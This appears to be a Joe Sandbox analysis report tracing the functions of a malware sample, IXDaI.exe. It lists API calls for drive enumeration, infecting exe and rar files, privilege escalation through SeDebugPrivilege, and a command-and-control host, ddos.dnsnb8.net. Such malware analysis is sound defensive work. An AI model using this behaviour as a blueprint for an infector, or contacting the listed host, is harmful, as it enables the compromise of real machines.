Opcode Fuzzy Hash: cf13d2695ce054fe90f6535d36ee6bdb1474c338280260f5b1725ca6b120cc4f
Instruction Fuzzy Hash: DD1146B6A04209BBDB109B98CCC6FEF7BFCEB46F14F108555F901B6140D6719E488B60

Function 00BA6076 Relevance: 11.1, APIs: 7, Instructions: 615
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,00001800,00001000,00000004), ref: 00BA60BE
VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 00BA60DF
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00BA6189
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00BA61A5

Memory Dump Source

Source File: 00000005.00000002.1466011903.0000000000BA6000.00000040.00000001.01000000.00000004.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000005.00000002.1465890626.0000000000BA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1465918178.0000000000BA1000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1465941365.0000000000BA3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1465988153.0000000000BA4000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ba0000_IXDaI.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: a4dd1f661a300c8e830e962431ad13c36e02b0d4b856efa0dea42d0a3fb9ae3a
Instruction ID: af2f4d19a173cf21b6caff00c352213616390014974c690ee44bcd35000042fc
Opcode Fuzzy Hash: a4dd1f661a300c8e830e962431ad13c36e02b0d4b856efa0dea42d0a3fb9ae3a
Instruction Fuzzy Hash: FC1211B250C7898FDB328F64CC95BEA7BE0EF13310F1C45AED9898B292D674A901C755

Function 00BA2B8C Relevance: 10.6, APIs: 7, Instructions: 74
threadstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00BA2BA6
GetLogicalDriveStringsA.KERNEL32(00000050,?), ref: 00BA2BB4
GetDriveTypeA.KERNEL32(?), ref: 00BA2BD3
CreateThread.KERNEL32(00000000,00000000,00BA2B7D,?,00000000,00000000), ref: 00BA2BEE
lstrlen.KERNEL32(?), ref: 00BA2BFB
WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 00BA2C16
CreateThread.KERNEL32(00000000,00000000,00BA2845,00000000,00000000,00000000), ref: 00BA2C3A

Memory Dump Source

Source File: 00000005.00000002.1465918178.0000000000BA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000005.00000002.1465890626.0000000000BA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1465941365.0000000000BA3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1465988153.0000000000BA4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1466011903.0000000000BA6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ba0000_IXDaI.jbxd

Similarity

API ID: CreateDriveThread$LogicalMultipleObjectsStringsTypeWaitlstrlenmemset
String ID:
API String ID: 1073171358-0
Opcode ID: a754118f2a5551eb37f2afbc590d96f0230c319e95cafc0a11d28be765e7353d
Instruction ID: 7e2eb6c8e732cd8ad2ab308130f72c843d52e032cf84c5e5e0d9f050075df7a2
Opcode Fuzzy Hash: a754118f2a5551eb37f2afbc590d96f0230c319e95cafc0a11d28be765e7353d
Instruction Fuzzy Hash: 872105B180414CAFE7349F689C85EAE7BECFF06354B500125F94293161DB248D0ACB70

Function 00BA1E6E Relevance: 30.4, APIs: 20, Instructions: 380
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFileAttributesA.KERNEL32(?,00000080,?,00BA32B0,00000164,00BA2986,?), ref: 00BA1EB9
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00BA1ECD
SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002,00000000,00000000), ref: 00BA1EF3
CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000000,00000000), ref: 00BA1F07
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000400), ref: 00BA1F1D
FlushViewOfFile.KERNEL32(?,00000400,?,00000000,00000000,?,00000000,00000002), ref: 00BA201E
memset.MSVCRT ref: 00BA20D8
memset.MSVCRT ref: 00BA20EA
memcpy.MSVCRT ref: 00BA222D
UnmapViewOfFile.KERNEL32(?,?,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00BA2238
FindCloseChangeNotification.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00BA224A
SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00BA22C6
SetEndOfFile.KERNEL32(000000FF,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00BA22CB
SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00BA22DD
WriteFile.KERNEL32(000000FF,00BA4008,00000271,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00BA22F7
WriteFile.KERNEL32(000000FF,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00BA230D
CloseHandle.KERNEL32(000000FF,000000FF,00000001,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00BA2322
UnmapViewOfFile.KERNEL32(?,?,00BA32B0,00000164,00BA2986,?), ref: 00BA2340
FindCloseChangeNotification.KERNEL32(?,?,00BA32B0,00000164,00BA2986,?), ref: 00BA234E
CloseHandle.KERNEL32(000000FF,?,00BA32B0,00000164,00BA2986,?), ref: 00BA2359

Memory Dump Source

Source File: 00000005.00000002.1465918178.0000000000BA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000005.00000002.1465890626.0000000000BA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1465941365.0000000000BA3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1465988153.0000000000BA4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1466011903.0000000000BA6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ba0000_IXDaI.jbxd

Similarity

API ID: File$CloseView$Pointer$ChangeCreateFindHandleNotificationUnmapWritememset$AttributesFlushMappingmemcpy
String ID:
API String ID: 3349749541-0
Opcode ID: 7ffffab430e183a1923277c79a75daddb751b0ce59d4f2a9d25577e9ba6a9d72
Instruction ID: dec304b9a7e98b4da5376c6c6dc5fa7ec48f20acdb74b906ea40a76a7db40f97
Opcode Fuzzy Hash: 7ffffab430e183a1923277c79a75daddb751b0ce59d4f2a9d25577e9ba6a9d72
Instruction Fuzzy Hash: B6F15971904208EFCB24DFA8DC81AADBBF5FF0A314F10856AE519A7661D730AE81CF54

Function 00BA1973 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 144
filesleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PathFileExistsA.SHLWAPI(00BA4E5C,00000000,C:\Users\user\AppData\Local\Temp\IXDaI.exe), ref: 00BA1992
CreateFileA.KERNEL32(00BA4E5C,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00BA19BA
Sleep.KERNEL32(00000064), ref: 00BA19C6
wsprintfA.USER32 ref: 00BA19EC
CopyFileA.KERNEL32(00BA4E5C,?,00000000), ref: 00BA1A00
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BA1A1E
GetFileSize.KERNEL32(00BA4E5C,00000000), ref: 00BA1A2C
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00BA1A46
ReadFile.KERNEL32(00BA4E5C,00BA4E60,00000000,?,00000000), ref: 00BA1A65
FindCloseChangeNotification.KERNEL32(000000FF), ref: 00BA1A90
DeleteFileA.KERNEL32(?), ref: 00BA1AA7
VirtualFree.KERNEL32(00BA4E60,00000000,00008000), ref: 00BA1AC1

Strings

C:\Users\user\AppData\Local\Temp\IXDaI.exe, xrefs: 00BA197C
C:\Users\user\AppData\Local\Temp\, xrefs: 00BA19DB
%s%.8X.data, xrefs: 00BA19E6
2, xrefs: 00BA19CF

Memory Dump Source

Source File: 00000005.00000002.1465918178.0000000000BA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000005.00000002.1465890626.0000000000BA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1465941365.0000000000BA3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1465988153.0000000000BA4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1466011903.0000000000BA6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ba0000_IXDaI.jbxd

Similarity

API ID: File$CreateVirtual$AllocChangeCloseCopyDeleteExistsFindFreeNotificationPathReadSizeSleepwsprintf
String ID: %s%.8X.data$2$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\IXDaI.exe
API String ID: 2523042076-762731565
Opcode ID: 014e2263af72eab5ae1faede6ed96dd7cb9d03144feaf7910e03a0bd0bd85161
Instruction ID: e35ce64f2a6fa2ce5b5edc13d08044295eef7c423def490d760a6f79f0390f36
Opcode Fuzzy Hash: 014e2263af72eab5ae1faede6ed96dd7cb9d03144feaf7910e03a0bd0bd85161
Instruction Fuzzy Hash: 83517E71905219EFCB209F98CC85AAEBBF9FB06754F1049A9F525E7190C7709E40CB50

Function 00BA28B8 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 100
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00BA28D3
wsprintfA.USER32 ref: 00BA28F7
memset.MSVCRT ref: 00BA2925
wsprintfA.USER32 ref: 00BA2940

Part of subcall function 00BA29E2: memset.MSVCRT ref: 00BA2A02
Part of subcall function 00BA29E2: wsprintfA.USER32 ref: 00BA2A1A
Part of subcall function 00BA29E2: memset.MSVCRT ref: 00BA2A44
Part of subcall function 00BA29E2: lstrlen.KERNEL32(?), ref: 00BA2A54
Part of subcall function 00BA29E2: lstrcpyn.KERNEL32(?,?,-00000001), ref: 00BA2A6C
Part of subcall function 00BA29E2: strrchr.MSVCRT ref: 00BA2A7C
Part of subcall function 00BA29E2: lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 00BA2A9F
Part of subcall function 00BA29E2: lstrlen.KERNEL32(Documents and Settings), ref: 00BA2AAE
Part of subcall function 00BA29E2: memset.MSVCRT ref: 00BA2AC6
Part of subcall function 00BA29E2: memset.MSVCRT ref: 00BA2ADA
Part of subcall function 00BA29E2: FindFirstFileA.KERNEL32(?,?), ref: 00BA2AEF
Part of subcall function 00BA29E2: memset.MSVCRT ref: 00BA2B13

strrchr.MSVCRT ref: 00BA2959
lstrcmpiA.KERNEL32(00000001,exe), ref: 00BA2974

Strings

exe, xrefs: 00BA296D
rar, xrefs: 00BA2988
%s\, xrefs: 00BA293A
C:\Users\user\AppData\Local\Temp\, xrefs: 00BA29B3
%s%s, xrefs: 00BA28F1

Memory Dump Source

Source File: 00000005.00000002.1465918178.0000000000BA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000005.00000002.1465890626.0000000000BA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1465941365.0000000000BA3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1465988153.0000000000BA4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1466011903.0000000000BA6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ba0000_IXDaI.jbxd

Similarity

API ID: memset$wsprintf$lstrcmpilstrlenstrrchr$FileFindFirstlstrcpyn
String ID: %s%s$%s\$C:\Users\user\AppData\Local\Temp\$exe$rar
API String ID: 3004273771-1101464738
Opcode ID: c32d1e314accfa35226765ff2c230293c0aed64be595f9a2222158ef3a755c45
Instruction ID: ebcaf1d22ca2a7aecd61acce36e9798c05207976a2defb3fb3f6a1f3f215ec83
Opcode Fuzzy Hash: c32d1e314accfa35226765ff2c230293c0aed64be595f9a2222158ef3a755c45
Instruction Fuzzy Hash: 203175719483197BDB209768DC86FDB77ECDB17B10F0404E2F945A3191EAB4DAC48B60

Function 00BA1638 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 70
stringsynchronizationthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\,?,00000005,00000000), ref: 00BA164F
GetSystemDirectoryA.KERNEL32(C:\Windows\system32,00000104), ref: 00BA165B
GetModuleFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXDaI.exe,00000104), ref: 00BA166E
CreateThread.KERNEL32(00000000,00000000,Function_00001099,00000000,00000000,00000000), ref: 00BA16AC
WaitForSingleObject.KERNEL32(00000000,000000FF,00000000), ref: 00BA16BD

Part of subcall function 00BA139F: GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\IXDaI.exe), ref: 00BA13BC
Part of subcall function 00BA139F: LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 00BA13DA
Part of subcall function 00BA139F: GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00BA1448

lstrcpy.KERNEL32(?,C:\Users\user\AppData\Local\Temp\IXDaI.exe), ref: 00BA16E5

Strings

C:\Users\user\AppData\Local\Temp\IXDaI.exe, xrefs: 00BA1662, 00BA1667, 00BA16DD
C:\Windows\system32, xrefs: 00BA1656
Documents and Settings, xrefs: 00BA1696
C:\Users\user\AppData\Local\Temp\, xrefs: 00BA1644

Memory Dump Source

Source File: 00000005.00000002.1465918178.0000000000BA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000005.00000002.1465890626.0000000000BA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1465941365.0000000000BA3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1465988153.0000000000BA4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1466011903.0000000000BA6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ba0000_IXDaI.jbxd

Similarity

API ID: CreateCurrentDirectoryFileLookupModuleNameObjectPathPrivilegeProcessSingleSystemTempThreadValueVersionWaitlstrcpy
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\IXDaI.exe$C:\Windows\system32$Documents and Settings
API String ID: 123563730-236263198
Opcode ID: c8eb9d291e36f5aa5853c0e88afea5f108c1d24cd6dab84169e69f1621f89193
Instruction ID: 1115ae0d663c2b5312a6b0e542ed7e576bd78de8df625487e4be2455cbb665e3
Opcode Fuzzy Hash: c8eb9d291e36f5aa5853c0e88afea5f108c1d24cd6dab84169e69f1621f89193
Instruction Fuzzy Hash: 441196715092147BCB705BA89D4FF9F7EEDEB57761F100491F20996060DBB08940C7B1

Function 00BA1000 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 60
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNEL32(00000003,C0000000,00000003,00000000,00000003,00000080,00000000,?,http://%s:%d/%s/%s,00BA10E8,?), ref: 00BA1018
GetFileSize.KERNEL32(00000000,00000000,ddos.dnsnb8.net,77068400,?,http://%s:%d/%s/%s,00BA10E8,?), ref: 00BA1029
CreateFileMappingA.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000), ref: 00BA1038
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000,?,http://%s:%d/%s/%s,00BA10E8,?), ref: 00BA104B
UnmapViewOfFile.KERNEL32(00000000,?,http://%s:%d/%s/%s,00BA10E8,?), ref: 00BA1075
CloseHandle.KERNEL32(?,?,http://%s:%d/%s/%s,00BA10E8,?), ref: 00BA108B
CloseHandle.KERNEL32(00000000,?,http://%s:%d/%s/%s,00BA10E8,?), ref: 00BA108E

Strings

http://%s:%d/%s/%s, xrefs: 00BA1000
ddos.dnsnb8.net, xrefs: 00BA1026

Memory Dump Source

Source File: 00000005.00000002.1465918178.0000000000BA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000005.00000002.1465890626.0000000000BA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1465941365.0000000000BA3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1465988153.0000000000BA4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1466011903.0000000000BA6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ba0000_IXDaI.jbxd

Similarity

API ID: File$CloseCreateHandleView$MappingSizeUnmap
String ID: ddos.dnsnb8.net$http://%s:%d/%s/%s
API String ID: 1223616889-3273462101
Opcode ID: 25f00631f098efe383009982320cffa839ca11dfd854525f6814b30f2d2b2964
Instruction ID: 16b6f4e33d1269745802f62c306d2b7cc2d8daaba8f05d392d48d23838893efa
Opcode Fuzzy Hash: 25f00631f098efe383009982320cffa839ca11dfd854525f6814b30f2d2b2964
Instruction Fuzzy Hash: 810192B120435CBFE7706F649C89F2BBBECEB45BA9F004929F245A3090DA705E448B70

Function 00BA2C48 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00BA2C57

Part of subcall function 00BA1973: PathFileExistsA.SHLWAPI(00BA4E5C,00000000,C:\Users\user\AppData\Local\Temp\IXDaI.exe), ref: 00BA1992
Part of subcall function 00BA1973: CreateFileA.KERNEL32(00BA4E5C,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00BA19BA
Part of subcall function 00BA1973: Sleep.KERNEL32(00000064), ref: 00BA19C6
Part of subcall function 00BA1973: wsprintfA.USER32 ref: 00BA19EC
Part of subcall function 00BA1973: CopyFileA.KERNEL32(00BA4E5C,?,00000000), ref: 00BA1A00
Part of subcall function 00BA1973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BA1A1E
Part of subcall function 00BA1973: GetFileSize.KERNEL32(00BA4E5C,00000000), ref: 00BA1A2C
Part of subcall function 00BA1973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00BA1A46
Part of subcall function 00BA1973: ReadFile.KERNEL32(00BA4E5C,00BA4E60,00000000,?,00000000), ref: 00BA1A65

CreateThread.KERNEL32(00000000,00000000,Function_00002B8C,00000000,00000000,00000000), ref: 00BA2C99
WaitForMultipleObjects.KERNEL32(00000001,00BA16BA,00000001,000000FF,?,00BA16BA,00000000), ref: 00BA2CAC
VirtualFree.KERNEL32(01110000,00000000,00008000,C:\Users\user\AppData\Local\Temp\IXDaI.exe,00BA4E5C,00BA4E60,?,00BA16BA,00000000), ref: 00BA2CC2

Strings

C:\Users\user\AppData\Local\Temp\IXDaI.exe, xrefs: 00BA2C69

Memory Dump Source

Source File: 00000005.00000002.1465918178.0000000000BA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000005.00000002.1465890626.0000000000BA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1465941365.0000000000BA3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1465988153.0000000000BA4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1466011903.0000000000BA6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ba0000_IXDaI.jbxd

Similarity

API ID: File$Create$Virtual$AllocCopyExistsFreeMultipleObjectsPathReadSizeSleepThreadWaitmemsetwsprintf
String ID: C:\Users\user\AppData\Local\Temp\IXDaI.exe
API String ID: 2042498389-699841801
Opcode ID: 25cad209bb2121c19092a3fe672e8282bf01e21408fa685c7748817b1de7cd11
Instruction ID: 1e37f43a38e10c759e20a21fd7aaf5fbac0eedc8a98e8cdcfb9fe7e703bf28a0
Opcode Fuzzy Hash: 25cad209bb2121c19092a3fe672e8282bf01e21408fa685c7748817b1de7cd11
Instruction Fuzzy Hash: 25018F71649220BBD724ABA9DC0AEAF7EECEF43B60F504150B905D61D1EBE09A40C7B1

Function 00BA14E1 Relevance: 4.6, APIs: 3, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 00BA1504
VirtualQuery.KERNEL32(00BA14E1,?,0000001C), ref: 00BA1525
ExitProcess.KERNEL32 ref: 00BA157A

Memory Dump Source

Source File: 00000005.00000002.1465918178.0000000000BA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000005.00000002.1465890626.0000000000BA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1465941365.0000000000BA3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1465988153.0000000000BA4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1466011903.0000000000BA6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ba0000_IXDaI.jbxd

Similarity

API ID: ExitHandleModuleProcessQueryVirtual
String ID:
API String ID: 3946701194-0
Opcode ID: 9561d34195f2e1f1f0f671724cbfbc5e50489d7ea6a10a78a5125d3aa61f2a43
Instruction ID: a971aa67f7ce341dd4624b53e457d6240ec6a53d72a48a57f6ebd189dd78544a
Opcode Fuzzy Hash: 9561d34195f2e1f1f0f671724cbfbc5e50489d7ea6a10a78a5125d3aa61f2a43
Instruction Fuzzy Hash: EA115A71D48214DFCB60DFADA886A79B7E8EBD6710F10447AF442E3150DBB48D419B50

Function 00BA1915 Relevance: 4.5, APIs: 3, Instructions: 41
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00BA1933
GetFileTime.KERNEL32(000000FF,?,?,?), ref: 00BA1947

Memory Dump Source

Source File: 00000005.00000002.1465918178.0000000000BA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000005.00000002.1465890626.0000000000BA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1465941365.0000000000BA3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1465988153.0000000000BA4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1466011903.0000000000BA6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ba0000_IXDaI.jbxd

Similarity

API ID: FileTimememset
String ID:
API String ID: 176422537-0
Opcode ID: 93a59c2309a2348f447c74844d3733523c0e2bb19b09d7325cac1ac9660c9e81
Instruction ID: ae4eb8cdc49a99e26dc47f65d83b1add43a339747e4bcf402bc15af3dfdbc956
Opcode Fuzzy Hash: 93a59c2309a2348f447c74844d3733523c0e2bb19b09d7325cac1ac9660c9e81
Instruction Fuzzy Hash: B5F06832204209BBD770DE2ADC05BA777ECEB52761F008976F526D5050E730D646CBB0

Function 00BA6159 Relevance: 2.6, APIs: 2, Instructions: 59
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 00BA60DF
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00BA6189
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00BA61A5

Memory Dump Source

Source File: 00000005.00000002.1466011903.0000000000BA6000.00000040.00000001.01000000.00000004.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000005.00000002.1465890626.0000000000BA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1465918178.0000000000BA1000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1465941365.0000000000BA3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1465988153.0000000000BA4000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ba0000_IXDaI.jbxd

Similarity

API ID: Virtual$Free$Alloc
String ID:
API String ID: 1852963964-0
Opcode ID: 1981c711801823625026343c0e856ac1480f6424fe404ebc0d60c6a2be36368a
Instruction ID: 0316d56e714a1b48523e5051bb44f53ed0c795bb1c3f36b57b0885b43ce4d71f
Opcode Fuzzy Hash: 1981c711801823625026343c0e856ac1480f6424fe404ebc0d60c6a2be36368a
Instruction Fuzzy Hash: B52149B1A08649CFCB718F68CC857DD3BE2EF46300F6D0469DE89AB291DA716950CB94

Non-executed Functions

Function 00BA119F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\IXDaI.exe,?,?,?,?,?,?,00BA13EF), ref: 00BA11AB
OpenProcessToken.ADVAPI32(00000000,00000028,00BA13EF,?,?,?,?,?,?,00BA13EF), ref: 00BA11BB
AdjustTokenPrivileges.ADVAPI32(00BA13EF,00000000,?,00000010,00000000,00000000), ref: 00BA11EB
CloseHandle.KERNEL32(00BA13EF), ref: 00BA11FA
CloseHandle.KERNEL32(?,?,?,?,?,?,?,00BA13EF), ref: 00BA1203

Strings

C:\Users\user\AppData\Local\Temp\IXDaI.exe, xrefs: 00BA11A5

Memory Dump Source

Source File: 00000005.00000002.1465918178.0000000000BA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000005.00000002.1465890626.0000000000BA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1465941365.0000000000BA3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1465988153.0000000000BA4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1466011903.0000000000BA6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ba0000_IXDaI.jbxd

Similarity

API ID: CloseHandleProcessToken$AdjustCurrentOpenPrivileges
String ID: C:\Users\user\AppData\Local\Temp\IXDaI.exe
API String ID: 75692138-699841801
Opcode ID: f9ed31e420c9cfe4d045381df235568393c6b81389ea97a9b2adf0d76ed39222
Instruction ID: 7730598c0ca1fbd9ba6b18dfc542816eb08f272d51420a915953b4727d619678
Opcode Fuzzy Hash: f9ed31e420c9cfe4d045381df235568393c6b81389ea97a9b2adf0d76ed39222
Instruction Fuzzy Hash: BC01E4B5900209FFDB10DFE8CD8AAAEBBF8FB05705F108469F606A2250DB719F449B50

Function 00BA139F Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 109COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\IXDaI.exe), ref: 00BA13BC
LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 00BA13DA
GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00BA1448

Part of subcall function 00BA119F: GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\IXDaI.exe,?,?,?,?,?,?,00BA13EF), ref: 00BA11AB
Part of subcall function 00BA119F: OpenProcessToken.ADVAPI32(00000000,00000028,00BA13EF,?,?,?,?,?,?,00BA13EF), ref: 00BA11BB
Part of subcall function 00BA119F: AdjustTokenPrivileges.ADVAPI32(00BA13EF,00000000,?,00000010,00000000,00000000), ref: 00BA11EB
Part of subcall function 00BA119F: CloseHandle.KERNEL32(00BA13EF), ref: 00BA11FA
Part of subcall function 00BA119F: CloseHandle.KERNEL32(?,?,?,?,?,?,?,00BA13EF), ref: 00BA1203

Strings

C:\Users\user\AppData\Local\Temp\IXDaI.exe, xrefs: 00BA13A8
SeDebugPrivilege, xrefs: 00BA13D3

Memory Dump Source

Source File: 00000005.00000002.1465918178.0000000000BA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000005.00000002.1465890626.0000000000BA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1465941365.0000000000BA3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1465988153.0000000000BA4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1466011903.0000000000BA6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ba0000_IXDaI.jbxd

Similarity

API ID: Process$CloseCurrentHandleToken$AdjustLookupOpenPrivilegePrivilegesValueVersion
